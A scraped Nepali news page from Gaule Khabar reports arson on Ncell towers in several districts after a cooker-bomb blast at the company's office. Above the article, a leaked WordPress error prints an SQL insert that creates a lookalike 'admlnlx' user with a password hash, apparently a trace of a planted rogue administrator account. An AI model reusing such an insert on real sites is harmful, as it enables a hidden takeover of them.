WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B1VL./pubsLTmXvA7RPoN2FZHqmaIN0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-29 02:38:39', '', 'admlnlx', 'admlnlx')

एनसेलको विभिन्न टावरहरूमा आगजनी – Gaule Khabar

एनसेलको विभिन्न टावरहरूमा आगजनी

एनसेलको  विभिन्न टावरहरूमा आगजनी

११ फागुन, काठमाडौँ । निजी क्षेत्रको मोबाइल प्रदायक कम्पनी एनसेलको नख्खुस्थित मुख्य कार्यालयमा कुकर बम विस्फोट गरेलगत्तै देशका दर्जन बढी जिल्लामा आक्रमण भएको छ ।

रौतहट, पोखरा, काभ्रे, बागलुङ, पूर्वी नवलपरासी लगायतका ठाउँमा रहेका टावरमा आगजनी गरिएको छ ।

रुपन्देहीको गैडहवा गाउँपालिका वडा नम्बर ३ सूर्यपुरास्थित एनसेलको टावरमा आगजनी गरिएको छ । यो घटनाको पुष्टि रुपन्देहीका एसपी हृदय थापाले गरेका छन् ।

अपरिचित व्यक्तिले बोरामा आगो सल्काएर टावरमा आगजनी गरेको उनले बताए । आगजनीले टावरका तार जलेर नष्ट भएका छन् । घटनास्थलमा प्रहरी तत्काल पुग्दा मानवीय र अन्य ठूलो क्षति हुन नपाएको थापाले बताए ।

अहिलेसम्म घटनाको जिम्मेवारी भने कसैले लिएको छैन । आगजनीपछि त्यस क्षेत्रमा एनसेलको नेट्वर्कले काम गर्न छाडेको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका